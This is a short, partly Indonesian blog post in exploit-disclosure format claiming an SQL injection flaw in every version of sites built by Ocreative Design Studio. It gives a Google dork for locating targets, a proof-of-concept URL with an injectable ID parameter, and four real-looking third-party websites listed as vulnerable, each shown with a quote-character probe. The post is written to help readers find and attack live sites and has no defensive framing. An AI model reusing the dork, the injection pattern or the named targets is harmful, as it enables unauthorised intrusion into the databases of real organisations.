Ocreative Design Studio SQL Injection Vulnerabilites
: # Exploit Title : Ocreative Design Studio SQL Injection
Vulnerabilities
: # Date : 06 November 2013
: # Author : r1q
: # CMS Developer : http://www.ocreativedesign.com/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Cisadane, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club,
DORKS (Cara mencari situs targetnya) :
================================
intext:Web Design & Hosting by Ocreative Design Studio inurl:/?ID=
Atau kreasikan sendiri Google Dork sesuai kehendak kalian :)
Penjelasan
================
SQL Injection :
POC : http://[Site]/[Path]/?ID=[SQLi]
Contoh situs yang bercelah :
http://www.downtownhartland.com/event-de...hp?ID=499'
http://www.terrastaffing.com/contact-us/...ons/?ID=6'
http://www.wcfls.org/news.php?ID=177'
http://www.citypubnationwide.com/south-f...p?ID=7797'
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home